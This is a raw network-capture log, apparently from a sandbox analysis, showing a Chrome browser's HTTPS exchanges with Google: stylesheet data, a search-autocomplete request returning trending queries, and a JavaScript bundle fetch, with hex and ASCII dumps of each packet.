2024-09-26 15:55:27 UTC	2143	IN	Data Raw: 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 30 3b 6c 65 66 74 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 6f 70 61 63 69 74 79 3a 30 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 31 30 30 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 30 62 35 37 64 30 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 76 61 72 28 2d 2d 67 6d 33 2d 73 79 73 2d 63 6f 6c 6f 72 2d 70 72 69 6d 61 72 79 2c 23 30 62 35 37 64 30 29 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 6f 70 61 63 69 74 79 20 2e 35 73 20 65 61 73 65 2d 6f 75 74 7d 2e 72 72 34 79 35 63 3a 68 6f 76 65 72 3a 3a 62 65 66 6f 72 65 7b 6f 70 61 63 69 74 79 3a 2e 30 38 7d 2e 72 72 34 79 35 63 3a 61 63 74 69 76 65 3a 3a 62 65 66 6f 72 65 2c 2e 72 72 34 79 35 63 3a 61 63 74 69 76 65 Data Ascii: ;position:absolute;top:0;left:0;width:100%;height:100%;opacity:0;border-radius:100px;background:#0b57d0;background:var(--gm3-sys-color-primary,#0b57d0);transition:opacity .5s ease-out}.rr4y5c:hover::before{opacity:.08}.rr4y5c:active::before,.rr4y5c:active
2024-09-26 15:55:27 UTC	2143	IN	Data Raw: 73 2d 63 6f 6c 6f 72 2d 6f 6e 2d 70 72 69 6d 61 72 79 2c 23 30 36 32 65 36 66 29 7d 2e 79 5a 71 4e 6c 3a 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 20 22 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 30 3b 6c 65 66 74 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 6f 70 61 63 69 74 79 3a 30 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 31 30 30 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 76 61 72 28 2d 2d 67 6d 33 2d 73 79 73 2d 63 6f 6c 6f 72 2d 6f 6e 2d 70 72 69 6d 61 72 79 2c 23 66 66 66 29 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 6f 70 61 63 69 74 79 20 2e 35 73 20 65 61 73 65 2d 6f 75 74 7d 2e 79 5a 71 4e 6c 3a 68 6f 76 65 72 3a 3a 62 65 66 6f 72 65 Data Ascii: s-color-on-primary,#062e6f)}.yZqNl::before{content:" ";position:absolute;top:0;left:0;width:100%;height:100%;opacity:0;border-radius:100px;background:#fff;background:var(--gm3-sys-color-on-primary,#fff);transition:opacity .5s ease-out}.yZqNl:hover::before
2024-09-26 15:55:27 UTC	2143	IN	Data Raw: 3a 6e 6f 6e 65 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 37 34 37 37 37 35 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 67 6d 33 2d 73 79 73 2d 63 6f 6c 6f 72 2d 6f 75 74 6c 69 6e 65 2c 23 37 34 37 37 37 35 29 7d 2e 6b 42 32 75 35 65 3a 68 6f 76 65 72 3a 3a 62 65 66 6f 72 65 7b 6f 70 61 63 69 74 79 3a 2e 30 38 7d 2e 6b 42 32 75 35 65 3a 61 63 74 69 76 65 2c 2e 6b 42 32 75 35 65 3a 61 63 74 69 76 65 3a 66 6f 63 75 73 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 37 34 37 37 37 35 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 67 6d 33 2d 73 79 73 2d 63 6f 6c 6f 72 2d 6f 75 74 6c 69 6e 65 2c 23 37 34 37 37 37 35 29 7d 2e 6b 42 32 75 35 65 3a 61 63 74 69 76 65 3a 3a 62 65 66 6f 72 65 2c 2e 6b 42 32 75 35 65 3a 61 63 74 69 76 65 Data Ascii: :none;border-color:#747775;border-color:var(--gm3-sys-color-outline,#747775)}.kB2u5e:hover::before{opacity:.08}.kB2u5e:active,.kB2u5e:active:focus{border-color:#747775;border-color:var(--gm3-sys-color-outline,#747775)}.kB2u5e:active::before,.kB2u5e:active
2024-09-26 15:55:27 UTC	2143	IN	Data Raw: 75 73 2c 2e 61 6d 45 30 4d 64 2e 4e 4b 6d 46 4e 63 20 2e 79 5a 71 4e 6c 3a 66 6f 63 75 73 2c 2e 61 6d 45 30 4d 64 2e 4e 4b 6d 46 4e 63 20 2e 79 5a 71 4e 6c 3a 66 6f 63 75 73 2d 76 69 73 69 62 6c 65 2c 2e 61 6d 45 30 4d 64 2e 4e 4b 6d 46 4e 63 20 2e 79 5a 71 4e 6c 3a 61 63 74 69 76 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 32 62 38 62 35 3b 6f 75 74 6c 69 6e 65 2d 63 6f 6c 6f 72 3a 23 66 32 62 38 62 35 7d 2e 78 46 49 54 6d 62 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 35 30 25 3b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 63 6f 6c 6f 72 3a 23 31 66 31 66 31 66 3b 63 75 72 73 6f 72 3a 70 6f Data Ascii: us,.amE0Md.NKmFNc .yZqNl:focus,.amE0Md.NKmFNc .yZqNl:focus-visible,.amE0Md.NKmFNc .yZqNl:active{background-color:#f2b8b5;outline-color:#f2b8b5}.xFITmb{position:relative;background:none;border-radius:50%;border:1px solid transparent;color:#1f1f1f;cursor:po
2024-09-26 15:55:27 UTC	2143	IN	Data Raw: 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 72 67 62 28 32 31 38 2c 32 32 30 2c 32 32 34 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6c 69 70 3a 70 61 64 64 69 6e 67 2d 62 6f 78 3b 62 6f 72 64 65 72 3a 34 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 38 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 7d 2e 6f 69 71 6d 6e 63 3a 3a 2d 77 65 62 6b 69 74 2d 73 63 72 6f 6c 6c 62 61 72 2d 74 72 61 63 6b 2c 2e 6f 69 71 6d 6e 63 3a 3a 2d 77 65 62 6b 69 74 2d 73 63 72 6f 6c 6c 62 61 72 2d 74 72 61 63 6b 3a 68 6f 76 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 7d 73 65 6e 74 69 6e 65 6c 7b 7d 3c 2f 73 74 79 6c 65 3e 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 64 31 Data Ascii: {background:rgb(218,220,224);background-clip:padding-box;border:4px solid transparent;border-radius:8px;box-shadow:none}.oiqmnc::-webkit-scrollbar-track,.oiqmnc::-webkit-scrollbar-track:hover{background:none;border:none}sentinel{}</style><script nonce="d1
2024-09-26 15:55:27 UTC	2143	IN	Data Raw: 6d 69 6c 79 3a 27 52 6f 62 6f 74 6f 27 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 3b 73 72 63 3a 75 72 6c 28 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 72 6f 62 6f 74 6f 2f 76 31 38 2f 4b 46 4f 6c 43 6e 71 45 75 39 32 46 72 31 4d 6d 45 55 39 66 43 52 63 34 45 73 41 2e 77 6f 66 66 32 29 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 3b 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 55 2b 30 34 36 30 2d 30 35 32 46 2c 55 2b 31 43 38 30 2d 31 43 38 38 2c 55 2b 32 30 42 34 2c 55 2b 32 44 45 30 2d 32 44 46 46 2c 55 2b 41 36 34 30 2d 41 36 39 46 2c 55 2b 46 45 32 45 2d 46 45 32 46 3b 7d 40 66 6f 6e 74 2d 66 61 63 65 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 27 52 6f 62 6f 74 6f 27 3b 66 6f Data Ascii: mily:'Roboto';font-style:normal;font-weight:500;src:url(//fonts.gstatic.com/s/roboto/v18/KFOlCnqEu92Fr1MmEU9fCRc4EsA.woff2)format('woff2');unicode-range:U+0460-052F,U+1C80-1C88,U+20B4,U+2DE0-2DFF,U+A640-A69F,U+FE2E-FE2F;}@font-face{font-family:'Roboto';fo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.16	49734	172.217.16.132	443	6888	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 15:55:27 UTC	1402	OUT	GET /complete/search?q&cp=0&client=gws-wiz&xssi=t&gs_pcrt=2&hl=en&authuser=0&psi=64P1ZseiHfKwi-gPg-6IsAw.1727366125395&dpr=1&nolsbt=1 HTTP/1.1 Host: www.google.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-arch: "x86" sec-ch-ua-full-version: "117.0.5938.132" sec-ch-ua-platform-version: "10.0.0" sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132" sec-ch-ua-bitness: "64" sec-ch-ua-model: "" sec-ch-prefers-color-scheme: light sec-ch-ua-wow64: ?0 sec-ch-ua-platform: "Windows" Accept: / X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUX Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://www.google.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: AEC=AVYB7cpCm7Ppd5A-tplbZAmaFYD6xsQnKIxvsmCv6L3W9rcCKonA7GZa8I8; NID=517=AmejulbRjs41gm5HAh0KNWIbESmYMNZ1axMfLtSSaMj3ipS3W-ZIczoXLjeaRFrsNlCKVipoFABp4RnsYthLAR_8X_MjQNiqFRyKiEcC7JOYrvXd8n41SO2Dq_friOqzZJv7SdIo1yrE5-GOgKAzqwIB7IqmX4e1csjhzX78XTAVb9Og_NFq0OtWtOB7198KZzuO
2024-09-26 15:55:27 UTC	1305	IN	HTTP/1.1 200 OK X-Content-Type-Options: nosniff Date: Thu, 26 Sep 2024 15:55:27 GMT Expires: Thu, 26 Sep 2024 15:55:27 GMT Cache-Control: private, max-age=3600 Content-Type: application/json; charset=UTF-8 Strict-Transport-Security: max-age=31536000 Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-Qf_sJOnj5vf-2rVMki7eWA' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]} Accept-CH: Sec-CH-Prefers-Color-Scheme Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-09-26 15:55:27 UTC	85	IN	Data Raw: 31 30 33 35 0d 0a 29 5d 7d 27 0a 5b 5b 5b 22 64 65 6e 76 65 72 20 62 72 6f 6e 63 6f 73 20 72 75 6e 6e 69 6e 67 20 62 61 63 6b 73 22 2c 30 2c 5b 33 2c 33 35 37 2c 33 36 32 2c 33 39 36 2c 31 34 33 5d 2c 7b 22 7a 66 22 3a 33 33 2c 22 7a 6c 22 3a 38 2c 22 7a Data Ascii: 1035)]}'[[["denver broncos running backs",0,[3,357,362,396,143],{"zf":33,"zl":8,"z
2024-09-26 15:55:27 UTC	1390	IN	Data Raw: 70 22 3a 7b 22 67 73 5f 73 73 22 3a 22 31 22 7d 7d 5d 2c 5b 22 61 67 61 74 68 61 20 61 6c 6c 20 61 6c 6f 6e 67 20 65 70 69 73 6f 64 65 20 33 22 2c 30 2c 5b 33 2c 33 35 37 2c 33 36 32 2c 33 39 36 2c 31 34 33 5d 2c 7b 22 7a 66 22 3a 33 33 2c 22 7a 6c 22 3a 38 2c 22 7a 70 22 3a 7b 22 67 73 5f 73 73 22 3a 22 31 22 7d 7d 5d 2c 5b 22 76 69 72 61 6c 20 70 69 7a 7a 61 20 64 6f 6d 69 6e 6f 73 20 63 6f 75 70 6f 6e 22 2c 30 2c 5b 33 2c 33 35 37 2c 33 36 32 2c 33 39 36 2c 31 34 33 5d 2c 7b 22 7a 66 22 3a 33 33 2c 22 7a 6c 22 3a 38 2c 22 7a 70 22 3a 7b 22 67 73 5f 73 73 22 3a 22 31 22 7d 7d 5d 2c 5b 22 67 65 74 74 79 73 62 75 72 67 20 63 6f 6c 6c 65 67 65 20 73 74 75 64 65 6e 74 22 2c 34 36 2c 5b 33 2c 33 35 37 2c 33 36 32 2c 33 39 36 2c 31 34 33 5d 2c 7b 22 6c 6d 22 Data Ascii: p":{"gs_ss":"1"}}],["agatha all along episode 3",0,[3,357,362,396,143],{"zf":33,"zl":8,"zp":{"gs_ss":"1"}}],["viral pizza dominos coupon",0,[3,357,362,396,143],{"zf":33,"zl":8,"zp":{"gs_ss":"1"}}],["gettysburg college student",46,[3,357,362,396,143],{"lm"
2024-09-26 15:55:27 UTC	1390	IN	Data Raw: 42 53 6f 73 46 48 4f 2b 6d 35 74 33 41 47 4e 36 37 36 54 67 42 39 58 6d 4e 54 56 31 4c 6d 4c 6f 70 46 43 4c 67 57 58 73 4f 35 73 70 32 34 75 63 66 66 72 59 4d 6c 79 5a 4d 30 45 55 31 52 4d 36 66 39 33 56 78 6e 71 43 52 6a 64 34 7a 73 50 62 65 77 57 31 78 7a 75 63 4c 38 77 2b 6f 66 56 56 56 42 70 6b 71 30 71 6b 73 49 75 6d 65 6d 74 56 64 54 32 35 75 53 51 4c 41 58 32 75 4f 32 43 62 77 6a 62 44 63 6d 35 4b 35 33 52 78 35 5a 54 77 79 72 57 78 77 31 43 6f 4a 7a 46 47 51 65 6d 56 49 44 68 75 51 54 59 6b 44 76 63 48 65 39 67 53 36 62 4e 59 4b 66 4c 7a 61 4f 6e 69 54 33 4b 6d 6d 41 78 74 47 70 46 74 4b 79 4d 70 37 37 48 35 4a 73 63 59 5a 31 56 52 31 57 59 5a 67 46 63 77 31 46 51 53 6b 30 73 38 59 30 4a 70 33 49 47 78 4e 78 73 31 68 35 33 2b 45 71 54 31 6c 4a 43 Data Ascii: BSosFHO+m5t3AGN676TgB9XmNTV1LmLopFCLgWXsO5sp24ucffrYMlyZM0EU1RM6f93VxnqCRjd4zsPbewW1xzucL8w+ofVVVBpkq0qksIumemtVdT25uSQLAX2uO2CbwjbDcm5K53Rx5ZTwyrWxw1CoJzFGQemVIDhuQTYkDvcHe9gS6bNYKfLzaOniT3KmmAxtGpFtKyMp77H5JscYZ1VR1WYZgFcw1FQSk0s8Y0Jp3IGxNxs1h53+EqT1lJC
2024-09-26 15:55:27 UTC	1292	IN	Data Raw: 41 36 6c 4c 45 32 38 39 2f 77 41 59 6e 33 79 2f 49 48 67 45 51 2f 69 43 45 4d 57 31 64 57 49 6e 66 34 49 77 52 54 4c 6c 39 4c 48 4a 30 61 6d 73 2f 6d 45 45 6c 69 76 61 2f 59 4d 42 79 62 34 74 53 67 61 37 69 78 79 70 36 6c 52 6d 53 79 54 73 78 4e 44 42 4f 68 4e 31 6c 59 62 48 6e 33 62 39 79 4f 34 38 2f 4a 77 6e 39 50 54 54 52 79 52 74 53 71 72 79 45 76 4c 4c 47 75 6f 62 62 38 2f 6d 33 6a 42 69 2f 55 74 49 61 51 30 77 68 6b 31 4d 77 73 79 6b 48 2b 6f 37 57 76 33 76 62 7a 34 77 50 4e 6e 2b 58 79 42 41 4b 4b 4e 55 56 74 57 6e 6f 71 51 33 74 74 5a 76 66 76 35 33 37 67 59 44 4c 62 6e 52 6b 35 34 78 31 4e 4d 75 72 71 53 44 4e 4b 69 47 4b 42 43 75 67 56 50 56 63 58 65 37 49 74 69 47 35 47 78 34 2f 74 6a 37 4f 58 30 65 5a 55 30 43 4c 54 6c 31 4f 6e 33 41 32 6b 49 Data Ascii: A6lLE289/wAYn3y/IHgEQ/iCEMW1dWInf4IwRTLl9LHJ0ams/mEEliva/YMByb4tSga7ixyp6lRmSyTsxNDBOhN1lYbHn3b9yO48/Jwn9PTTRyRtSqryEvLLGuobb8/m3jBi/UtIaQ0whk1MwsykH+o7Wv3vbz4wPNn+XyBAKKNUVtWnoqQ3ttZvfv537gYDLbnRk54x1NMurqSDNKiGKBCugVPVcXe7ItiG5Gx4/tj7OX0eZU0CLTl1On3A2kI
2024-09-26 15:55:27 UTC	88	IN	Data Raw: 35 32 0d 0a 44 61 35 50 47 43 71 45 7a 64 59 64 41 57 59 48 55 48 46 37 71 66 74 68 7a 6a 53 30 54 63 58 63 67 32 61 6a 52 71 38 79 4f 57 6b 62 55 48 53 33 62 5a 74 74 2f 37 59 4c 68 71 41 59 4e 55 65 37 73 6c 37 46 75 39 37 48 6e 78 74 2b 52 67 46 71 4e 32 0d 0a Data Ascii: 52Da5PGCqEzdYdAWYHUHF7qfthzjS0TcXcg2ajRq8yOWkbUHS3bZtt/7YLhqAYNUe7sl7Fu97Hnxt+RgFqN2
2024-09-26 15:55:27 UTC	779	IN	Data Raw: 33 30 34 0d 0a 46 37 61 5a 54 76 71 41 74 71 74 38 44 48 76 34 5a 56 47 46 56 56 51 32 70 72 6f 79 6e 59 48 39 2b 33 66 38 59 56 59 59 7a 6f 6d 54 44 35 41 65 57 4d 51 36 72 7a 49 39 53 4a 71 65 51 6f 35 58 65 7a 48 61 39 2b 44 35 78 38 55 31 54 50 48 48 4b 59 68 71 73 77 75 78 4a 4a 73 42 62 62 34 33 77 73 71 55 39 4b 53 73 78 30 54 49 4e 77 33 39 52 38 43 33 6a 7a 6a 45 56 6a 43 4a 56 69 64 30 49 2f 55 50 50 33 78 59 77 6a 6a 51 36 6b 66 4a 6b 4c 6c 6a 6f 7a 2f 2f 32 51 5c 75 30 30 33 64 5c 75 30 30 33 64 22 7d 5d 2c 5b 22 6c 65 62 61 6e 6f 6e 20 69 73 72 61 65 6c 20 68 65 7a 62 6f 6c 6c 61 68 22 2c 30 2c 5b 33 2c 33 35 37 2c 33 36 32 2c 33 39 36 2c 31 34 33 5d 2c 7b 22 7a 66 22 3a 33 33 2c 22 7a 6c 22 3a 38 2c 22 7a 70 22 3a 7b 22 67 73 5f 73 73 22 3a Data Ascii: 304F7aZTvqAtqt8DHv4ZVGFVVQ2proynYH9+3f8YVYYzomTD5AeWMQ6rzI9SJqeQo5XezHa9+D5x8U1TPHHKYhqswuxJJsBbb43wsqU9KSsx0TINw39R8C3jzjEVjCJVid0I/UPP3xYwjjQ6kfJkLljoz//2Q\u003d\u003d"}],["lebanon israel hezbollah",0,[3,357,362,396,143],{"zf":33,"zl":8,"zp":{"gs_ss":
2024-09-26 15:55:27 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.16	49733	172.217.16.132	443	6888	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 15:55:27 UTC	1655	OUT	GET /xjs/_/js/md=2/k=xjs.hd.en.UzAaLIOvKPw.es5.O/am=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAEAQoAAAAABAAQAAAAAAAAAAAAAAAAAAAYIAACIBAAABAHAAABAIAIAAAAEJAIAACcCjTAAACAAmAAAAAAAIAAAEigAAIAAAAAMAAIAAAAAAAAAFAAAAAAAAAAAAAAAAACCAQAAAAAAAAAAAAAAQAAAAAHoAAAAAAAAAQAAAgAABgAEyAAEAAAAAAAB9ABA8AIYUFgAAAAAAAAAAAAAACECCYC4koCAAAQAAAAAAAAAAAAAAAJCSJi5s/rs=ACT90oG4TYLnMZI5e05pJINIZi4Fy5M0eA HTTP/1.1 Host: www.google.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-arch: "x86" sec-ch-ua-full-version: "117.0.5938.132" sec-ch-ua-platform-version: "10.0.0" sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132" sec-ch-ua-bitness: "64" sec-ch-ua-model: "" sec-ch-prefers-color-scheme: light sec-ch-ua-wow64: ?0 sec-ch-ua-platform: "Windows" Accept: / X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUX Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://www.google.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: AEC=AVYB7cpCm7Ppd5A-tplbZAmaFYD6xsQnKIxvsmCv6L3W9rcCKonA7GZa8I8; NID=517=AmejulbRjs41gm5HAh0KNWIbESmYMNZ1axMfLtSSaMj3ipS3W-ZIczoXLjeaRFrsNlCKVipoFABp4RnsYthLAR_8X_MjQNiqFRyKiEcC7JOYrvXd8n41SO2Dq_friOqzZJv7SdIo1yrE5-GOgKAzqwIB7IqmX4e1csjhzX78XTAVb9Og_NFq0OtWtOB7198KZzuO
2024-09-26 15:55:27 UTC	829	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/gws-team Cross-Origin-Resource-Policy: cross-origin Cross-Origin-Opener-Policy: same-origin; report-to="gws-team" Report-To: {"group":"gws-team","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws-team"}]} Content-Length: 12020 X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 0 Date: Thu, 26 Sep 2024 08:56:03 GMT Expires: Fri, 26 Sep 2025 08:56:03 GMT Cache-Control: public, immutable, max-age=31536000 Last-Modified: Thu, 26 Sep 2024 06:30:51 GMT Content-Type: text/javascript; charset=UTF-8 Vary: Accept-Encoding, Origin Age: 25164 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-09-26 15:55:27 UTC	561	IN	Data Raw: 7b 22 63 68 75 6e 6b 54 79 70 65 73 22 3a 22 31 30 30 30 30 31 31 31 31 31 31 31 30 30 31 31 31 31 30 30 30 31 30 30 30 30 31 30 31 31 30 31 30 30 30 30 30 30 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 30 31 31 30 31 31 31 31 31 31 31 31 31 31 31 30 31 30 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 Data Ascii: {"chunkTypes":"100001111111001111000100001011010000001111111111111111111111111111111011011111111111010111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111
2024-09-26 15:55:27 UTC	1390	IN	Data Raw: 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 32 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 32 32 31 32 32 32 32 32 32 31 32 32 31 32 32 31 32 31 31 31 32 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 32 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 32 32 32 31 32 32 31 32 32 31 32 32 32 31 32 32 31 32 32 31 32 32 31 32 32 31 32 32 31 32 32 31 32 32 31 32 32 31 32 32 31 32 32 31 32 32 31 32 32 31 32 32 31 32 32 31 32 32 31 32 32 31 32 32 31 32 32 31 32 32 31 32 32 31 32 32 31 32 32 31 32 32 31 32 32 31 32 32 31 32 32 31 Data Ascii: 212121212121212121212121212121212121212121212121212221212121212121212221222222122122121112212121212121212121212121212121212221212121212121212121212121212121212121222212212212221221221221221221221221221221221221221221221221221221221221221221221221221221221
2024-09-26 15:55:27 UTC	1390	IN	Data Raw: 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 Data Ascii: 111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111
2024-09-26 15:55:27 UTC	1390	IN	Data Raw: 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 32 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 33 31 31 31 32 31 33 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 33 31 31 31 31 31 33 31 33 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 32 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 30 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 33 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 32 31 31 31 31 31 31 31 31 32 31 33 31 33 31 31 32 31 33 31 31 31 31 31 31 31 31 31 31 31 31 31 Data Ascii: 111111111111111121111111111111111111111131112131111111111111111111111111111111111111111131111131311111111111111111111111111111111112111111111111111111111111110111111111111111111111111111111111111113111111111111111111111111121111111121313112131111111111111
